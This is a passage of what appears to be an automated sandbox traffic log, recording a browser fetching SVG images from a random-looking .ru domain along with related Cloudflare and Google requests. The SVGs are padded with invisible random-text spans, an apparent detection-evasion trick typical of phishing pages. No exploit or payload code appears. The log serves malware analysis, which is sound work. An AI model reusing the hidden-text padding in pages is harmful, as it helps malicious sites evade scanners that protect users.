                                                                                                                                                                                    2024-01-26 13:42:25 UTC647INData Raw: 34 31 34 0d 0a 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 39 4a 5a 6e 4b 65 51 6c 6b 62 77 6b 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e
                                                                                                                                                                                    Data Ascii: 414<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">9JZnKeQlkbwk</span><span style="display: inlin
                                                                                                                                                                                    2024-01-26 13:42:25 UTC404INData Raw: 31 31 2e 35 37 38 48 31 38 76 2e 38 34 34 48 37 2e 36 31 37 6c 33 2e 39 32 31 2c 33 2e 39 32 38 2d 2e 35 39 34 2e 35 39 34 4c 36 2c 31 32 6c 34 2e 39 34 34 2d 34 2e 39 34 34 6d 30 2d 2e 31 34 31 2d 2e 30 37 31 2e 30 37 4c 35 2e 39 32 39 2c 31 31 2e 39 32 39 2c 35 2e 38 35 38 2c 31 32 6c 2e 30 37 31 2e 30 37 31 2c 34 2e 39 34 34 2c 34 2e 39 34 34 2e 30 37 31 2e 30 37 2e 30 37 31 2d 2e 30 37 2e 35 39 34 2d 2e 35 39 35 2e 30 37 31 2d 2e 30 37 2d 2e 30 37 31 2d 2e 30 37 31 4c 37 2e 38 35 38 2c 31 32 2e 35 32 32 48 31 38 2e 31 56 31 31 2e 34 37 38 48 37 2e 38 35 38 6c 33 2e 37 35 31 2d 33 2e 37 35 37 2e 30 37 31 2d 2e 30 37 31 2d 2e 30 37 31 2d 2e 30 37 2d 2e 35 39 34 2d 2e 35 39 35 2d 2e 30 37 31 2d 2e 30 37 5a 22 20 66 69 6c 6c 3d 22 23 34 30 34 30 34 30 22
                                                                                                                                                                                    Data Ascii: 11.578H18v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944m0-.141-.071.07L5.929,11.929,5.858,12l.071.071,4.944,4.944.071.07.071-.07.594-.595.071-.07-.071-.071L7.858,12.522H18.1V11.478H7.858l3.751-3.757.071-.071-.071-.07-.594-.595-.071-.07Z" fill="#404040"
                                                                                                                                                                                    2024-01-26 13:42:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    82192.168.2.1649836172.67.139.1444436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:42:25 UTC449OUTGET /VyRsmGftiIlOxrabXBIOtQtS/6UjhZnuFkmp/6aInfUMVk HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:42:26 UTC734INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:42:26 GMT
                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AxkZmYtHMSfYxMeOYqjF1Kcqu1838dWan1j%2Bc%2B%2FcL%2BKuc1vREKDrEu1QRfMaURIFn2Zg%2BHgUUB8hjZfl6XcUTgiEReQ%2B1UxZVEBCYT%2BA8sAaGMrFkmBtehV%2Fk%2FX2KhTJW%2BSta0S9JHRxrl3Rh7BAmjfNIdc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92ddb3b98b04b-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:42:26 UTC635INData Raw: 39 39 30 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 39 22 20 68 65 69 67 68 74 3d 22 35 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 36 20 34 34 22 3e 3c 64 65 66 73 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 31 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 31 70 78 3b 22 3e 32 52 61 55 46 4c 62 39 4f 42 3c 2f 74 65 78 74 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b
                                                                                                                                                                                    Data Ascii: 990<svg xmlns="http://www.w3.org/2000/svg" width="49" height="50" viewBox="0 0 46 44"><defs><text style="display: inline;color: rgba(26, 125, 117, 0);max-width: 0.01px;max-height: 0.01px;font-size: 0.01px;">2RaUFLb9OB</text><span style="display: inline;
                                                                                                                                                                                    2024-01-26 13:42:26 UTC1369INData Raw: 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 4a 63 37 34 55 49 6c 4b 72 3c 2f 73 70 61 6e 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 61 22 20 77 69 64 74 68 3d 22 34 35 22 20 68 65 69 67 68 74 3d 22 35 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 62 22 20 64 3d 22 4d 34 30 2c 33 32 2e 35 37 38 56 34 30 48 33 32 56 33 36 48 32 38 56 33 32 48 32 34 56 32 38 2e 37 36 36 41 31 30 2e 36 38 39 2c 31 30 2e 36 38 39 2c 30 2c 30 2c 31 2c 31 39 2c 33 30 61 31 30 2e 39 2c 31 30 2e 39 2c 30 2c 30 2c 31 2d 35 2e 35 34 37 2d 31 2e 35 2c 31 31 2e 31 30 36 2c 31 31 2e 31 30
                                                                                                                                                                                    Data Ascii: ba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">Jc74UIlKr</span><rect class="a" width="45" height="52"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.10
                                                                                                                                                                                    2024-01-26 13:42:26 UTC451INData Raw: 32 2c 30 2c 30 2c 31 2d 2e 36 32 35 2d 2e 34 32 32 2c 32 2e 31 39 31 2c 32 2e 31 39 31 2c 30 2c 30 2c 31 2d 2e 34 33 38 2d 2e 36 34 31 41 31 2e 37 30 35 2c 31 2e 37 30 35 2c 30 2c 30 2c 31 2c 31 34 2c 31 36 61 31 2e 39 33 38 2c 31 2e 39 33 38 2c 30 2c 30 2c 31 2c 2e 31 35 36 2d 2e 37 38 31 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 34 32 32 2d 2e 36 32 35 2c 32 2e 31 39 31 2c 32 2e 31 39 31 2c 30 2c 30 2c 31 2c 2e 36 34 31 2d 2e 34 33 38 41 31 2e 37 30 35 2c 31 2e 37 30 35 2c 30 2c 30 2c 31 2c 31 36 2c 31 34 5a 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 6d 61 78 2d 68 65
                                                                                                                                                                                    Data Ascii: 2,0,0,1-.625-.422,2.191,2.191,0,0,1-.438-.641A1.705,1.705,0,0,1,14,16a1.938,1.938,0,0,1,.156-.781,2,2,0,0,1,.422-.625,2.191,2.191,0,0,1,.641-.438A1.705,1.705,0,0,1,16,14Z"/><text style="display: inline;color: rgba(26, 125, 117, 0);max-width: 0.01px;max-he
                                                                                                                                                                                    2024-01-26 13:42:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    83192.168.2.1649837172.67.139.1444436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:42:25 UTC459OUTGET /VyRsmGftiIlOxrabXBIOtQtS/60DNPihs9uJ6rEVU/2qVT4IAbiSHSjf HTTP/1.1
                                                                                                                                                                                    Host: bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
                                                                                                                                                                                    2024-01-26 13:42:26 UTC720INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:42:26 GMT
                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TeasgO8LU4jQnaFKOdE14fnU8jwncrvhWr3%2F4oWgDP8qSm8atNwcanrwnLZU2dPDPb5Fb1Y0%2BNpqcF6IVcSbTmasqn4OWjxfdE9niHBn5DH7Z2jlJ%2BVZ9WEFTVowGYh747otI7qGmzmL24MloR6bBSBcmKc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92ddb4cae455e-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:42:26 UTC649INData Raw: 31 38 30 63 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 31 36 22 20 68 65 69 67 68 74 3d 22 31 30 38 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 46 55 48 6d 69 39 42 73 75 3c 2f 74 65 78 74 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22
                                                                                                                                                                                    Data Ascii: 180c<svg xmlns="http://www.w3.org/2000/svg" width="1916" height="1085" fill="none"><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">FUHmi9Bsu</text><g opacity=".2" clip-path="url(#E)"><text style="
                                                                                                                                                                                    2024-01-26 13:42:26 UTC1369INData Raw: 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 53 32 71 44 43 62 4e 42 42 52 53 79 3c 2f 74 65 78 74 3e 3c 70 61 74 68 20 64 3d 22 4d 33 39 34 2e 32 20 31 38 31 35 2e 36 63 37 34 36 2e 35 38 20 30 20 31 33 35 31 2e 38 2d 34 39 33 2e 32 20 31 33 35 31 2e 38 2d 31 31 30 31 2e 36 53 31 31 34 30 2e 37 38 2d 33 38 37 2e 36 20 33 39 34 2e 32 2d 33 38 37 2e 36 2d 39 35 37 2e 36 20 31 30 35 2e 36 30 33 2d 39 35 37 2e 36 20 37 31 34 2d 33 35 32 2e 33 38 20 31 38 31 35 2e 36 20 33 39 34 2e 32 20 31 38
                                                                                                                                                                                    Data Ascii: <text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">S2qDCbNBBRSy</text><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 18
                                                                                                                                                                                    2024-01-26 13:42:26 UTC1369INData Raw: 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 38 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 7a 76 61 69 68 72 6e 48 3c 2f 74 65 78 74 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c
                                                                                                                                                                                    Data Ascii: 1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(80) scale(1401.6 1720.8)"><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">zvaihrnH</text><text style="display: inl
                                                                                                                                                                                    2024-01-26 13:42:26 UTC1369INData Raw: 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 63 34 63 34 63 35 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 30 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 77 43 65 39 42 70 65 75 31 7a 48 3c 2f 74 65 78 74 3e 3c 2f 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e
                                                                                                                                                                                    Data Ascii: <stop offset="1" stop-color="#c4c4c5" stop-opacity="0"/><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">wCe9Bpeu1zH</text></radialGradient><text style="display: inline; color: #1A7D75; max-width: 0.
                                                                                                                                                                                    2024-01-26 13:42:26 UTC1369INData Raw: 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 2e 37 35 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 59 30 74 4b 78 71 5a 76 50 38 33 58 7a 6f 3c 2f 74 65 78 74 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 63 34 63 34 63 35 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 30 22 2f 3e 3c 74 65 78 74 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 31 41 37 44 37 35 3b 20 6d 61 78 2d 77 69
                                                                                                                                                                                    Data Ascii: stop-opacity=".75"/><text style="display: inline; color: #1A7D75; max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">Y0tKxqZvP83Xzo</text><stop offset="1" stop-color="#c4c4c5" stop-opacity="0"/><text style="display: inline; color: #1A7D75; max-wi
                                                                                                                                                                                    2024-01-26 13:42:26 UTC39INData Raw: 65 3a 20 30 2e 30 32 70 78 3b 22 3e 77 36 35 71 4e 7a 65 6f 75 74 42 45 3c 2f 74 65 78 74 3e 3c 2f 73 76 67 3e 0d 0a
                                                                                                                                                                                    Data Ascii: e: 0.02px;">w65qNzeoutBE</text></svg>
                                                                                                                                                                                    2024-01-26 13:42:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    84192.168.2.164984135.190.80.14436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:42:29 UTC584OUTOPTIONS /report/v3?s=xIs4GitNTFdKS3AY%2BYhM%2FRAckwwIG62VuJ8chdZDsC6k510203bTnoETMGEN4UdnuQ%2BDZBZ74uRapTIC2m5V6lBnKeNaaLIqGpm52PlD3QD%2BHUCmPyaltpHKqZh4Pad4SIDOn3%2FrgdiGc7vC9QAWlgvtc%2B8%3D HTTP/1.1
                                                                                                                                                                                    Host: a.nel.cloudflare.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Origin: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru
                                                                                                                                                                                    Access-Control-Request-Method: POST
                                                                                                                                                                                    Access-Control-Request-Headers: content-type
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:42:29 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    access-control-max-age: 86400
                                                                                                                                                                                    access-control-allow-methods: OPTIONS, POST
                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                    access-control-allow-headers: content-type, content-length
                                                                                                                                                                                    date: Fri, 26 Jan 2024 13:42:29 GMT
                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    85192.168.2.164984235.190.80.14436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:42:29 UTC509OUTPOST /report/v3?s=xIs4GitNTFdKS3AY%2BYhM%2FRAckwwIG62VuJ8chdZDsC6k510203bTnoETMGEN4UdnuQ%2BDZBZ74uRapTIC2m5V6lBnKeNaaLIqGpm52PlD3QD%2BHUCmPyaltpHKqZh4Pad4SIDOn3%2FrgdiGc7vC9QAWlgvtc%2B8%3D HTTP/1.1
                                                                                                                                                                                    Host: a.nel.cloudflare.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Content-Length: 3094
                                                                                                                                                                                    Content-Type: application/reports+json
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:42:29 UTC3094OUTData Raw: 5b 7b 22 61 67 65 22 3a 33 38 35 36 39 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 31 39 39 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 62 67 67 63 77 76 65 6b 6e 33 61 78 69 33 66 66 7a 35 61 69 2e 72 76 75 63 6f 75 69 6a 77 2e 72 75 2f 68 49 64 6c 4d 4c 4f 66 57 78 79 53 4f 54 72 39 46 66 6d 78 43 69 6a 71 66 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 37 39 2e 39 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70
                                                                                                                                                                                    Data Ascii: [{"age":38569,"body":{"elapsed_time":1199,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/hIdlMLOfWxySOTr9FfmxCijqf/","sampling_fraction":1.0,"server_ip":"104.21.79.9","status_code":404,"typ
                                                                                                                                                                                    2024-01-26 13:42:29 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    date: Fri, 26 Jan 2024 13:42:29 GMT
                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    86192.168.2.1649853142.251.15.1384436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:42:52 UTC449OUTGET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=0000000000000000000000000000000000000000825ED79361 HTTP/1.1
                                                                                                                                                                                    Host: clients1.google.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    2024-01-26 13:42:52 UTC817INHTTP/1.1 200 OK
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-OFrX_O0kTRqoZN7dVbhbHw' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/download-dt/1
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-GcpHN34zicG9PrCohFwM5w' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/download-dt/1
                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                    Content-Length: 220
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:42:52 GMT
                                                                                                                                                                                    Expires: Fri, 26 Jan 2024 13:42:52 GMT
                                                                                                                                                                                    Cache-Control: private, max-age=0
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                    Server: GSE
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-01-26 13:42:52 UTC220INData Raw: 72 6c 7a 43 31 3a 20 31 43 31 4f 4e 47 52 5f 65 6e 55 53 31 30 39 34 0a 72 6c 7a 43 32 3a 20 31 43 32 4f 4e 47 52 5f 65 6e 55 53 31 30 39 34 0a 72 6c 7a 43 37 3a 20 31 43 37 4f 4e 47 52 5f 65 6e 55 53 31 30 39 34 0a 64 63 63 3a 20 0a 73 65 74 5f 64 63 63 3a 20 43 31 3a 31 43 31 4f 4e 47 52 5f 65 6e 55 53 31 30 39 34 2c 43 32 3a 31 43 32 4f 4e 47 52 5f 65 6e 55 53 31 30 39 34 2c 43 37 3a 31 43 37 4f 4e 47 52 5f 65 6e 55 53 31 30 39 34 0a 65 76 65 6e 74 73 3a 20 43 31 49 2c 43 32 49 2c 43 37 49 2c 43 31 53 2c 43 37 53 0a 73 74 61 74 65 66 75 6c 2d 65 76 65 6e 74 73 3a 20 43 31 49 2c 43 32 49 2c 43 37 49 0a 63 72 63 33 32 3a 20 64 36 39 64 62 32 35 38 0a
